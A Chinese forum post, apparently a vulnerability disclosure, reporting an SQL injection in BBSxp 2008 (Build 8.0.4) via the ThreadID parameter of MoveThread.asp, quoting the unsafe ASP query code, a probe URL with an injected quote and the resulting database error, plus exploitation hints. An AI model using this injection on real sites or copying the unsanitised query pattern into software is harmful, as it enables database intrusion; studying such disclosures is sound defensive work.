BBSxp 2008 (Build: 8.0.4) Sql 注入漏洞
<P>漏洞发布:Tr4c3126Com<BR>影响版本 BBSxp 2008 (Build: 8.0.4)其他版本未看<BR>漏洞文件:MoveThread.asp<BR>MoveThread.asp行2-24 </P><P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR>
<DIV class=code><%<BR>if CookieUserName =empty then error("您还未<a href=""javascript:BBSXP_Modal.Open ('Login.asp',380,170 target=_blank);"">登录</a>论坛") '保存cookie登陆即可<BR><BR>ThreadID=Request("ThreadID") ' Sql Injection Vulnerability<BR><BR>If Not IsNumeric(ThreadID) then<BR> ThreadIDArray=Split(ThreadID,",") '判断数组,避免13行出错<BR> if IsArray(ThreadIDArray) then<BR> for i=0 to Ubound(ThreadIDArray)<BR> if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>系统不存在该帖子的资料"<BR> next<BR> ThreadIDSql=int(ThreadIDArray(0))<BR> else<BR> error("参数错误。")<BR> end if<BR>Else<BR> ThreadIDSql=int(ThreadID)<BR>End If<BR><BR>ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)<BR>%><BR><!-- #include file="Utility/ForumPermissions.asp" --></DIV></TD></TR></TBODY></TABLE>先执行了查询后判断了权限,导致普通用户即可进行sql注射。<BR>构造Url:http://www.target.com/movethread.asp?ThreadID=1,1&#39;<BR>提交,返回出错信息 </P>
<DIV class=code>Microsoft JET Database Engine 错误 '80040e14' <BR><BR>字符串的语法错误 在查询表达式 'ThreadID=1'' 中。 <BR><BR>/BBSXP_Class.asp,行 5</DIV>SQL 版本比较好利用,access的nbsi貌似只能猜解出表和字段,字段值无法猜解,需要手工进行。
re:BBSxp 2008 (Build: 8.0.4) Sql 注入漏洞
<P>那你今天送我什么啊?</P>
页:
[1]